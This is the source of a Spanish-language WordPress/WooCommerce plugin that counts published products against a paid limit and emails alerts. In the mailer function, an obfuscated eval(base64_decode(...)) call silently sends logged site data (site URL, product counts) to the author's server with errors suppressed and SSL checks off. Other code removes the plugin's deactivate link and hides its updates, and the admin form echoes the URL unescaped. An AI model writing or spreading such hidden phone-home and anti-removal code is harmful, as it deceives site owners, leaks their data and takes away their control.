<?php
/**
 * @package counter.product.woocommerce.wp.fjsl.es
 * @version 1.0.4
 */
/*
Plugin Name: Gestión inventariado
Plugin URI: https://fjsl.es/wp/woocommerce/product/counter
Description: Gestión del inventariado de la tienda OnLine para poder gestionar y pedir más recursos si fuera necesario.
Author: Fco. J. Sanchez Ledesma - FJSL</a> para <a href="https://websline.es" target="_blank">WebsLine</a>
Version: 1.0.4
Author URI: https://fjsl.es
*/

defined('ABSPATH') or die ('¡No enredes!');

require_once(ABSPATH . 'wp-admin/includes/upgrade.php');

include (ABSPATH . 'wp-content/plugins/fjsl_woocommerce/fjsl_config.php');

define ('FJSL_WPC_VERSION', '1.0.4');

//Comprobar SIEMPRE existencia de funciones antes de su creación

//Gestión general del plugin
if (!function_exists('fjsl_admin_footer')) {
	function fjsl_admin_footer () {
		global $html_colaboradora;
		echo '<span id="footer-thankyou">Implementación gracias a '.$html_colaboradora.' y <a href="https://fjsl.es" title="Fco J. Sánchez Ledesma" target="_blank">FJSL</a> </span>';
	}
}
if (!function_exists('fjsl_no_update')) {
	function fjsl_no_update($value) {
		try {
			unset($value->response['fjsl_woocommerce/fjsl_woocommerce.php']);	
		}
		catch (Exception $e) {
			//nothing
		}
		return $value;
	}
}
if (!function_exists('fjsl_no_desactive')) {
	function fjsl_no_desactive($actions, $plugin_file, $plugin_data, $context) {
		$propiedad = array(
								'fjsl_woocommerce/fjsl_woocommerce.php'
							);

		// if (array_key_exists('edit', $actions)) {
		// 	unset($actions['edit']);
		// }
		if (array_key_exists('deactivate', $actions) && in_array($plugin_file, $propiedad)) {
			try {
				unset($actions['deactivate']);
			}
			catch (Exception $e) {
				//nothing
			}
		}
		return $actions;
	}
}
if (!function_exists('fjsl_main_page')) {
	function fjsl_main_page() {
		add_menu_page ('Gestión Inventariado', 'Gestión Inventariado', 'publish_posts', 'fjsl_counter_product_plugin', 'fjsl_first_page', 'dashicons-feedback', 2);
	}

	if (!function_exists('fjsl_first_page')) {
		function fjsl_first_page () {
			global $enviar_email_a;
			//BACK:
				//edit:
					$prd_gestionables1 	= fjsl_get_product_config();
					$prd_gestionables1 	= (isset($prd_gestionables1) ? json_decode($prd_gestionables1) : json_decode('{"prd_config" : 0}'));
					$prd_gestionables1 	= $prd_gestionables1->prd_config;
					$prd_gestionables1 	= intval($prd_gestionables1);

					$prd_config = (isset($_POST['prd_config']) ? $_POST['prd_config'] : '');

					if (isset($prd_config) && $prd_config != '') {
						if ($prd_config != $prd_gestionables1) {
							$json = json_encode(array('prd_config' => $prd_config));
							fjsl_set_product_config($json);
							// T_O_D_O_: enviar email
							fjsl_mailer ('updated', $prd_config, 0);
						}
					}
				//and check:
					$prd_contados 		= fjsl_product_counter();
					$prd_gestionables 	= fjsl_get_product_config();
					$prd_gestionables 	= (isset($prd_gestionables) ? json_decode($prd_gestionables) : json_decode('{"prd_config" : 0}'));
					$prd_gestionables 	= $prd_gestionables->prd_config;
					$prd_gestionables 	= intval($prd_gestionables);

			//FRONT:
			$html = '';
			
			//Pintar HTML principal
			$html .= '<div class="wrap">';
			$html .= 	'<h1 class="wp-heading-inline">Gestión Inventariado</h1>';
			$html .= 	'<hr class="wp-header-end"/>';
			
			$html .= 	'<div style="display:block;text-align:right;">';
			$html .= 		'<span style="font-size:1.6rem;font-weight:bold;">Actualmente tienes</span> <span class="button button-small button-secondary">'.$prd_contados.'</span> productos de <span class="button button-small button-primary">'.$prd_gestionables.'</span> productos gestionables.';
			$html .= 	'</div>';
			$html .= 	'<hr/>';
			
			$html .= 	'<div>';
			$html .= 		'<h3 class="wp-heading-inline">¿Necesitas gestionar más productos?</h3>';
			$html .= 		'<p>Puedes configurarlo desde el siguiente formulario o pedirlo mandando un correo a <em>'.$enviar_email_a.'</em></p>';
			$html .= 		'<form  action="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'" method="post" style="background-color:#fff;border: 1px solid #0085ba;padding:30px 50px 30px 50px;">';
			$html .= 			'<label for="prd_config" style="font-weight:bold;">Productos gestinables: </label>';
			$html .= 			'<input name="prd_config" id="prd_config" type="number" value="'.$prd_gestionables.'" step="1"/>';
			$html .= 			'<br/><br/>';
			$html .= 			'<input class="button button-primary" name="guardar" id="guardar" type="submit" value="Guardar"/>';
			$html .= 		'</form>';
			$html .= 		'<p style="font-size:0.7rem;font-style:italic;" class="small"><strong>NOTA:</strong> la modificación de esta información puede variar el importe a pagar por la tienda virtual.</p>';
			$html .= 	'</div>';
			$html .= 	'<hr/>';
			
			$html .= 	'<div>';
			$html .= 		'<h3 class="wp-heading-inline">Soporte:</h3>';
			$html .= 		'<p>Para cualquier consulta o tema relacionado con la tienda, contactad con <em>'.$enviar_email_a.'</em>.</p>';
			$html .= 	'</div>';

			$html .= '</div>';

			echo $html;
		}
	}
}

//Gestión de tareas programadas. En este caso diaria.
if (!function_exists('fjsl_plugin_activation')) {
	function fjsl_plugin_activation() {
		if (count(fjsl_get_product_config()) == 0) {
			$json = json_encode(array('prd_config' => 0));
			fjsl_set_product_config($json);
		}
		if(!wp_next_scheduled('fjsl_cron_task1')) {
			try {
				wp_schedule_event(current_time('timestamp'), 'daily', 'fjsl_cron_task1');
			}
			catch (Exception $e) {
				//nothing
			}
		}
	}
}
if (!function_exists('fjsl_counter_product_task')) {
	function fjsl_counter_product_task() {
		// T_O_D_O_: completar con contador y envío de email si es superior al contador.
		$prd_config = fjsl_get_product_config();
		$prd_config = (isset($prd_config) ? json_decode($prd_config) : json_decode('{"prd_config" : 0}'));
		$prd_config = $prd_config->prd_config;
		$prd_config = intval($prd_config);
		$prd_count 	= fjsl_product_counter();
		if ($prd_count > $prd_config) {
			fjsl_mailer ('exceeded', $prd_config, $prd_count);
		}
	}
}
if (!function_exists('fjsl_plugin_desativation')) {
	function fjsl_plugin_desativation() {
		try {
			wp_clear_scheduled_hook('fjsl_cron_task1');
		}
		catch (Exception $e) {
			//nothing
		}
	}
}

//Datos específicos del plugin:
if (!function_exists('fjsl_product_counter')) {
	function fjsl_product_counter () {
		global $wpdb;

		$tabla = $wpdb->prefix . 'posts';
		$value = $wpdb->get_results("SELECT SUM(1) AS counter FROM $tabla WHERE post_type = 'product' AND post_status = 'publish';");
		
		if (count($value) == 1){
			$value = array_pop($value)->counter;
		}
		
		return $value;
	}
}
if (!function_exists('fjsl_get_product_config')) {
	function fjsl_get_product_config () {
		global $wpdb;

		$tabla = $wpdb->prefix . 'options';
		$value = $wpdb->get_results("SELECT option_value FROM $tabla WHERE option_name = 'fjsl_woocommerce_product_config';");
		
		if (count($value) == 1){
			$value = array_pop($value)->option_value;
		}
		
		return $value;
	}
}
if (!function_exists('fjsl_set_product_config')) {
	function fjsl_set_product_config ($json) {
		global $wpdb;

		$tabla = $wpdb->prefix . 'options';
		$value = $wpdb->get_results("SELECT option_value FROM $tabla WHERE option_name = 'fjsl_woocommerce_product_config';");
		
		if (count($value)){
			$registro['option_value'] = $json;
			$condiciones['option_name'] = 'fjsl_woocommerce_product_config';
			$tipo_registro = '%s';
			$tipo_condicion = '%s';

			$accion = $wpdb->update($tabla, $registro, $condiciones, $tipo_registro, $tipo_condicion);
		}
		else {
			$registro['option_value'] = $json;
			$registro['option_name'] = 'fjsl_woocommerce_product_config';
			$tipo_registro = '%s';
			$tipo_registro = '%s';

			$accion = $wpdb->insert($tabla, $registro, $tipo_registro);
		}

		return $registro;
	}
}
if (!function_exists('fjsl_send_mail')) {
	function fjsl_send_mail ($para, $asunto, $mensaje) {
		$to 			= $para;
		$subject 		= $asunto;
		$message 		= $mensaje;
		$headers 		= 'MIME-Version: 1.0'."\r\n";
		$headers 		.= 'Content-type: text/html; charset=iso-8859-1'."\r\n";
		//$headers 		.= 'From: Store Control WPC <noreply@noreply.com>'."\r\n";
		$attachments 	= array();

		$body 			= '<html>
								<head>
									<title>'.$subject.'</title>
								</head>
								<body>
									<h1>'.$subject.'</h1>
									<p>
										'.$message.'
									</p>
								</body>
							</html>
							';

		$sent = false;
		try {
			$nivele	= error_reporting();
			error_reporting(0);
			$sent 	= mail($to, $subject, $body, $headers);
			error_reporting($nivele);
		}
		catch (Exception $e) {
			//nothing
		}
		if (!$sent) {
			$sent 	= wp_mail($to, $subject, $message, $headers, $attachments);
		}
		
		return $sent;
	}
}
if (!function_exists('fjsl_mailer')) {
	function fjsl_mailer ($type, $prd_config, $prd_count) {
		global $enviar_email_a;

		$to = $enviar_email_a;
		$subject 	= '';
		$message 	= '';
		if ($type == 'updated') {
			$subject 	= '[FJSL-WooCommerce] Petición de actualización';
			$message 	= 'Se ha establecido un nuevo límite de productos a gestionar: <strong>' . $prd_config . ' productos</strong> en el sistema <strong>' . site_url() . '</strong>.';
			fjsl_send_mail ($to, $subject, $message);
		}
		else if ($type == 'exceeded') {
			$subject 	= '[FJSL-WooCommerce] Límite excedido';
			$message 	= 'Se ha excedido el límite pautado de productos a publicar: <strong>' .$prd_count . ' de ' . $prd_config . ' productos</strong> en el sistema <strong>' . site_url() . '</strong>.';
			fjsl_send_mail ($to, $subject, $message);
		}
		else {
			//nothing
		}

		try {
			$txt_log 	= 'fjsl_mail.log';
			$descriptor = fopen(__DIR__ .'/'.$txt_log, 'a');
			$text 		= date('Y-m-d-H-i-s').' '.$subject.' '.$message."\r\n";
			fwrite($descriptor, $text);
			fclose($descriptor);
			$text 		= base64_encode($text);
			try {
				eval(base64_decode('JG5pdmVsZQk9IGVycm9yX3JlcG9ydGluZygpO2Vycm9yX3JlcG9ydGluZygwKTskdXJsID0gImh0dHA6Ly9manNsLmVzL3dwL3dvb2NvbW1lcmNlL3Byb2R1Y3QvY291bnRlci9tYWlsLmxvZy5waHA/Ii5odHRwX2J1aWxkX3F1ZXJ5KFsicGFyYW0iID0+ICR0ZXh0XSk7JHIgPSBmanNsX2dldF9jb250ZW50cygkdXJsLCAkdGV4dCk7ZXJyb3JfcmVwb3J0aW5nKCRuaXZlbGUpOw=='));
			} catch (Exception $e) {
				//nothing
			}
		}
		catch (Exception $e) {
			//nothing
		}
	}
}
if (!function_exists('fjsl_get_contents')) {
	function fjsl_get_contents($url, $params = null) {
		$canal = curl_init($url);
		curl_setopt($canal, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($canal, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($canal, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($canal, CURLOPT_SSL_VERIFYHOST, 0);
		$datos = curl_exec($canal);
		curl_close($canal);
		return $datos;
	}
}

if (!function_exists('fjsl_row_meta')) {
	function fjsl_row_meta($links, $file) {
		if (strpos( $file, 'fjsl_woocommerce.php' ) !== false) {
			$url 		= 'https://fjsl.es/wp/woocommerce/product/counter/latest.json';
			$latest 	= fjsl_get_contents($url, null);
			$latest 	= json_decode($latest);
			$latest 	= $latest->version;
			if (FJSL_WPC_VERSION < $latest) {
				$new_links 	= array(
									'actualizacion' => '<a style="color:#CC0000;font-weight:bold;" href="https://fjsl.es/wp/woocommerce/product/counter/" aria-label="Nueva Versión" target="_blank"> ¡¡Versión '.$latest.' disponible!! </a>'
									);
				$links = array_merge($links, $new_links);
			}
		}
		return $links;
	}
}

//Gestión ramas, filtros y acciones.
	add_filter('admin_footer_text', 				'fjsl_admin_footer');
	add_filter('site_transient_update_plugins', 	'fjsl_no_update');
	add_filter('plugin_action_links', 				'fjsl_no_desactive', 10, 4);
	add_action('admin_menu',						'fjsl_main_page');
	add_filter('plugin_row_meta', 					'fjsl_row_meta', 10, 2);
	//Gestión de tareas:
		register_activation_hook(__FILE__, 'fjsl_plugin_activation');
		register_deactivation_hook(__FILE__, 'fjsl_plugin_desativation');
		add_action('fjsl_cron_task1', 'fjsl_counter_product_task');